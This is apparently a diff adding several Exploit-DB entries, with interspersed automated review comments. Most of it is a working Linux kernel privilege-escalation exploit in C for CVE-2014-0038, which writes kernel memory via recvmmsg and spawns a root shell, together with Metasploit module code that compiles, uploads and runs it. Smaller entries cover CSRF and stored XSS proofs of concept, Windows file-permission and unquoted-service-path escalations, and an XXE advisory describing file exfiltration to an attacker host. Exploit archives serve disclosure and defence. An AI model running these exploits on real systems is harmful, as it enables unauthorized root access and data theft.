+ #define _GNU_SOURCE
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
+ #define __X32_SYSCALL_BIT 0x40000000
+ #undef __NR_recvmmsg
+ #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+ #define VLEN 1
+ #define BUFSIZE 200
+
+ int port;
+
+ struct offset {
+ char *kernel_version;
+ unsigned long dest; // net_sysctl_root + 96
+ unsigned long original_value; // net_ctl_permissions
+ unsigned long prepare_kernel_cred;
+ unsigned long commit_creds;
+ };
+
+ struct offset offsets[] = {
+ {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+ {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+ {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+ {NULL,0,0,0,0}
+ };
+
+ void udp(int b) {
+ int sockfd;
+ struct sockaddr_in servaddr,cliaddr;
+ int s = 0xff+1;
+
+ if(fork() == 0) {
+ while(s > 0) {
+ fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+ sleep(1);
+ s--;
+ fprintf(stderr,".");
+ }
+
+ sockfd = socket(AF_INET,SOCK_DGRAM,0);
+ bzero(&servaddr,sizeof(servaddr));
+ servaddr.sin_family = AF_INET;
+ servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+ servaddr.sin_port=htons(port);
+ sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+ exit(0);
+ }
+
+ }
+
+ void trigger() {
+ open("/proc/sys/net/core/somaxconn",O_RDONLY);
+
+ if(getuid() != 0) {
+ fprintf(stderr,"not root, ya blew it!\n");
+ exit(-1);
+ }
+
+ fprintf(stderr,"w00p w00p!\n");
+ system("/bin/sh -i");
+ }
+
+ typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+ typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+ _commit_creds commit_creds;
+ _prepare_kernel_cred prepare_kernel_cred;
+
+ // thx bliss
+ static int __attribute__((regparm(3)))
+ getroot(void *head, void * table)
+ {
+ commit_creds(prepare_kernel_cred(0));
+ return -1;
+ }
+
+ void __attribute__((regparm(3)))
+ trampoline()
+ {
+ asm("mov $getroot, %rax; call *%rax;");
+ }
+
+ int main(void)
+ {
+ int sockfd, retval, i;
+ struct sockaddr_in sa;
+ struct mmsghdr msgs[VLEN];
+ struct iovec iovecs[VLEN];
+ char buf[BUFSIZE];
+ long mmapped;
+ struct utsname u;
+ struct offset *off = NULL;
+
+ uname(&u);
+
+ for(i=0;offsets[i].kernel_version != NULL;i++) {
+ if(!strcmp(offsets[i].kernel_version,u.release)) {
+ off = &offsets[i];
+ break;
+ }
+ }
+
+ if(!off) {
+ fprintf(stderr,"no offsets for this kernel version..\n");
+ exit(-1);
+ }
+
+ mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
+ mmapped &= 0x000000ffffffffff;
+
+ srand(time(NULL));
+ port = (rand() % 30000)+1500;
+
+ commit_creds = (_commit_creds)off->commit_creds;
+ prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+
+ mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+
+ if(mmapped == -1) {
+ perror("mmap()");
+ exit(-1);
+ }
+
+ memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+
+ memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+
+ if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+ perror("mprotect()");
+ exit(-1);
+ }
+
+ sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+ if (sockfd == -1) {
+ perror("socket()");
+ exit(-1);
+ }
+
+ sa.sin_family = AF_INET;
+ sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+ sa.sin_port = htons(port);
+
+ if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+ perror("bind()");
+ exit(-1);
+ }
+
+ memset(msgs, 0, sizeof(msgs));
+
+ iovecs[0].iov_base = &buf;
+ iovecs[0].iov_len = BUFSIZE;
+ msgs[0].msg_hdr.msg_iov = &iovecs[0];
+ msgs[0].msg_hdr.msg_iovlen = 1;
+
+ for(i=0;i < 3 ;i++) {
+ udp(i);
+ retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+ if(!retval) {
+ fprintf(stderr,"\nrecvmmsg() failed\n");
+ }
+ }
+
+ close(sockfd);
+ fprintf(stderr,"\n");
+ trigger();
+ }
+ }
+
+ filename = rand_text_alphanumeric(8)
+ executable_path = "#{datastore['WritableDir']}/#(unknown)"
+ payloadname = rand_text_alphanumeric(8)
+ payload_path = "#{datastore['WritableDir']}/#{payloadname}"
+
+ def has_prereqs?()
+ gcc = cmd_exec('which gcc')
+ if gcc.include?('gcc')
+ vprint_good('gcc is installed')
+ else
+ print_error('gcc is not installed. Compiling will fail.')
+ end
+ return gcc.include?('gcc')
+ end
+
+ compile = false
+ if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+ if has_prereqs?()
+ compile = true
+ vprint_status('Live compiling exploit on system')
+ else
+ vprint_status('Dropping pre-compiled exploit on system')
+ end
+ end
+ if check != CheckCode::Appears
+ fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+ end
+
+ def upload_and_chmod(fname,fcontent)
+ print_status "Writing to #{fname} (#{fcontent.size} bytes)"
+ rm_f fname
+ write_file(fname, fcontent)
+ cmd_exec("chmod +x #{fname}")
+ register_file_for_cleanup(fname)
+ end
+
+ if compile
+ recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
+ "system(\"#{payload_path}\");")
+ upload_and_chmod("#{executable_path}.c", recvmmsg)
+ vprint_status("Compiling #{executable_path}.c")
+ cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
+ register_file_for_cleanup(executable_path)
+ else
+ path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
+ fd = ::File.open( path, "rb")
+ recvmmsg = fd.read(fd.stat.size)
+ fd.close
+ upload_and_chmod(executable_path, recvmmsg)
+ # overwrite with the hardcoded variable names in the compiled versions
+ payload_filename = 'a0RwAacU'
+ payload_path = "/tmp/#{payload_filename}"
+ end
+
+ upload_and_chmod(payload_path, generate_payload_exe)
+ stime = Time.now
+ vprint_status("Exploiting... May take 13min. Start time: #{stime}")
+ output = cmd_exec(executable_path)
+ output.each_line { |line| vprint_status(line.chomp) }
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/40493.html b/platforms/php/webapps/40493.html
new file mode 100755
index 000000000..d92db9736
--- /dev/null
+++ b/platforms/php/webapps/40493.html
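Review bot: The pre-compiled branch of `exploit` opens the data file with `::File.open(path, "rb")`, reads it and calls `fd.close` with no `ensure`, so any exception between open and close leaks the descriptor; `recvmmsg = ::File.binread(path)` does the same work in one call and always closes the file. The nested `def kernel_vuln?()`, `def has_prereqs?()` and `def upload_and_chmod` are (re)defined as instance methods of the class every time `check` or `exploit` runs; moving them to ordinary private methods of the class is the idiomatic form and avoids method-redefinition warnings. `check` is invoked twice within `exploit` (at the top and again after the COMPILE decision), and the second call re-runs the same remote commands for no new information, so the second `if check != CheckCode::Appears` block can be dropped. The line `executable_path = "#{datastore['WritableDir']}/#(unknown)"` looks like a damaged interpolation of the otherwise unused `filename` local (presumably `#{filename}`); if the file really contains `#(unknown)`, every run drops the same fixed name and `filename` is dead. In the drop branch `payload_path` is also reassigned to a fixed `/tmp/...` path regardless of `WritableDir`, which silently contradicts the option's description and is worth a note in the option text.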
@@ -0,0 +1,94 @@ +# Exploit Title : Spacemarc News - Cross-Site Request +Forgery ( Add New Post) +# Author : Besim +# Google Dork : - +# Date : 10/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : http://www.spacemarc.it +# Software link : + http://www.hotscripts.com/listings/jump/download/107255 + + +*########################### CSRF PoC ###############################* + + + + + +
+ +
+ + + +*####################################################################* diff --git a/platforms/php/webapps/40495.html b/platforms/php/webapps/40495.html new file mode 100755 index 000000000..bb2f181a1 --- /dev/null +++ b/platforms/php/webapps/40495.html @@ -0,0 +1,38 @@ + + + + + +
+ + + + + + + + + + + + +
+ + + + + \ No newline at end of file diff --git a/platforms/php/webapps/40496.html b/platforms/php/webapps/40496.html new file mode 100755 index 000000000..bb37b54ea --- /dev/null +++ b/platforms/php/webapps/40496.html @@ -0,0 +1,83 @@ + + + + + + +
+ +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/40505.txt b/platforms/php/webapps/40505.txt new file mode 100755 index 000000000..4387582ac --- /dev/null +++ b/platforms/php/webapps/40505.txt @@ -0,0 +1,26 @@ +# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross +Site Scripting +# Author : Besim +# Google Dork : +# Date : 12/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : - +# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 + +Description : + +Vulnerable link : http://site_name/path/index.php?page=posts&post_id= + +Stored XSS Payload ( Comments ): * + +# Vulnerable URL : +http://site_name/path/index.php?page=posts&post_id= - Post comment section +# Vuln. Parameter : comment_user_name + +############ POST DATA ############ + +task=publish_comment&article_id=69&user_id=&comment_user_name=&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish +your comment + +############ ###################### diff --git a/platforms/php/webapps/40506.html b/platforms/php/webapps/40506.html new file mode 100755 index 000000000..7cfe7abaf --- /dev/null +++ b/platforms/php/webapps/40506.html @@ -0,0 +1,155 @@ +# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) +# Author : Besim +# Google Dork : +# Date : 12/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : - +# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 + + + +########################### CSRF PoC ############################### + + + + + +
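Review bot: The `Vulnerable link` and `Vulnerable URL` lines both end in `post_id=` with no value, and the POST data carries a fixed `article_id=69` and `captcha_code=DKF8` that are specific to the tester's instance and session; placeholders such as `<post_id>` and `<article_id>` would make the reproduction steps generic. The entry names `comment_user_name` as the affected parameter but states neither the defect nor a fix; a line such as `Fix: HTML-encode comment_user_name (and the other comment fields) when rendering stored comments` would make the advisory useful to defenders and to the vendor.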
+ +
+
+
+
+####################################################################
diff --git a/platforms/windows/local/40494.txt b/platforms/windows/local/40494.txt
new file mode 100755
index 000000000..5e6558ce5
--- /dev/null
+++ b/platforms/windows/local/40494.txt
@@ -0,0 +1,29 @@
+Minecraft Launcher: https://minecraft.net
+Version: 1.6.61
+By Ross Marks: http://www.rossmarks.co.uk
+Exploit-db: https://www.exploit-db.com/author/?a=8724
+Category: Local
+Tested on: Windows 10 x86/x64
+
+1) Insecure File Permissions Local Privilege Escalation
+
+Minecraft's launcher (minecraftLauncher.exe) suffers from an elevation of privileges
+vulnerability which can be used by a simple user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper permissions,
+with the 'F' flag (Full) for 'Users' group, making the entire directory
+'Minecraft' and its files and sub-dirs world-writable.
+
+This would allow an attacker the ability to inject code or replace the MinecraftLauncher
+executable and have it run in the context of the system.
+
+PoC:
+
+C:\Program Files (x86)\Minecraft>icacls MinecraftLauncher.exe
+MinecraftLauncher.exe BUILTIN\Users:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ PENTEST\ross.marks:(I)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
\ No newline at end of file
diff --git a/platforms/windows/local/40497.txt b/platforms/windows/local/40497.txt
new file mode 100755
index 000000000..d71cf386b
--- /dev/null
+++ b/platforms/windows/local/40497.txt
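Review bot: The impact claim `have it run in the context of the system` is not supported by the evidence in the hunk; the icacls output shows only inherited `(I)` Full-control entries on the executable, so a replaced MinecraftLauncher.exe runs with the privileges of whichever account launches it, and the escalation only materialises if an administrator (or a scheduled/elevated process) runs the launcher. The advisory would be stronger if it also showed the ACL of the parent `C:\Program Files (x86)\Minecraft` directory, since the `(I)` flag means the permissive `BUILTIN\Users:(F)` entry is inherited from there rather than set on the file. A remediation line is missing as well, e.g. `Fix: remove the inherited BUILTIN\Users Full-control entry from the Minecraft directory so it matches the default Program Files ACL, and monitor the launcher binary for unexpected modification.`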
@@ -0,0 +1,29 @@
+#########################################################################
+# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation
+# Date: 11/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://sheedantivirus.ir/
+# Software Link:http://dl.sheedantivirus.ir/setup.exe
+#version : 2.3 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+sheed AntiVirus installs a service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc ShavProt
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ShavProt
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ShavProt
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
diff --git a/platforms/xml/webapps/40501.txt b/platforms/xml/webapps/40501.txt
new file mode 100755
index 000000000..4543b1e66
--- /dev/null
+++ b/platforms/xml/webapps/40501.txt
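Review bot: The write-up omits the precondition that decides whether this is exploitable at all: the unquoted `BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe` only becomes a privilege escalation if a standard user can create files in `C:\` or `C:\Program Files\`, which default Windows ACLs do not allow, so the finding depends on those directory permissions having been weakened. Stating that precondition, and whether it was met on the "Tested on: Windows 7" host, would let a reader judge the real risk. The entry also gives no fix; a line such as `Fix: quote the service binary path, e.g. sc config ShavProt binPath= "\"C:\Program Files\Sheed AntiVirus\shgrprot.exe\""` would make it actionable for administrators and the vendor.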
@@ -0,0 +1,140 @@
+SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
+=======================================================================
+ title: XML External Entity Injection (XXE)
+ product: RSA Enterprise Compromise Assessment Tool (ECAT)
+ vulnerable version: 4.1.0.1
+ fixed version: 4.1.2.0
+ CVE Number: -
+ impact: Medium
+ homepage: https://www.rsa.com
+ found: 2016-04-27
+ by: Samandeep Singh (Office Singapore)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Bangkok - Berlin - Linz - Montreal - Moscow
+ Singapore - Vienna (HQ) - Vilnius - Zurich
+
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"RSA provides more than 30,000 customers around the world with the essential
+security capabilities to protect their most valuable assets from cyber threats.
+With RSA's award-winning products, organizations effectively detect,
+investigate, and respond to advanced attacks; confirm and manage identities; and
+ultimately, reduce IP theft, fraud, and cybercrime."
+
+Source: https://www.rsa.com/en-us/company/about
+
+
+Business recommendation:
+------------------------
+By exploiting the XXE vulnerability, an attacker can get read access to the
+filesystem of the user's system using RSA ECAT client and thus obtain sensitive
+information from the system. It is also possible to scan ports of the internal
+hosts and cause DoS on the affected host.
+
+SEC Consult recommends not to use the product until a thorough security
+review has been performed by security professionals and all identified
+issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) XML External Entity Injection
+The used XML parser is resolving external XML entities which allows attackers
+to read files and send requests to systems on the internal network (e.g port
+scanning). The vulnerability can be exploited by tricking the user of
+the application to import a whitelisting file with malicious XML code.
+
+
+Proof of concept:
+-----------------
+1) XML External Entity Injection (XXE)
+
+The RSA ECAT client allows users to import whitelisting files in XML format.
+By tricking the user to import an XML file with malicious XML code to the
+application, it's possible to exploit an XXE vulnerability within the application.
+
+For example by importing the following XML code, arbitrary files can be read
+from the client's system. The following code generates the connection request
+from the client system to attacker system.
+
+===============================================================================
+
+
+ ]>&xxe;
+===============================================================================
+
+IP:port = IP address and port where the attacker is listening for connections
+
+Furthermore some files can be exfiltrated to remote servers via the
+techniques described in:
+
+https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
+http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
+
+
+Vulnerable / tested versions:
+-----------------------------
+The XXE vulnerability has been verified to exist in the RSA ECAT software
+version 4.1.0.1 which was the latest version available at the time of
+discovery.
+
+
+Vendor contact timeline:
+------------------------
+2016-04-28: Vulnerabilities reported to the vendor by 3rd party
+2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
+2016-10-11: SEC Consult releases security advisory
+
+
+Solution:
+---------
+Update to version 4.1.2.0
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Montreal - Moscow
+Singapore - Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/Career.htm
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF S. Singh / @2016
\ No newline at end of file
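Review bot: `Workaround: None` is at odds with the advisory's own description, which says exploitation requires the user to import an attacker-supplied whitelisting XML file; until the upgrade is applied, treating whitelisting files as untrusted input and importing only files produced and verified in-house is a practical mitigation worth stating, e.g. `Workaround: only import whitelisting files from trusted, verified sources until 4.1.2.0 is deployed`. The fixed-version fields are also inconsistent: the header and Solution section say `4.1.2.0` while the timeline says `Fixed by vendor in version 4.1.2 (ECAT-5972)`, and one form should be used throughout. The root-cause sentence could name the defensive fix as well, i.e. disabling DTD processing and external entity resolution in the XML parser used for imports, which is the standard remedy the vendor presumably applied.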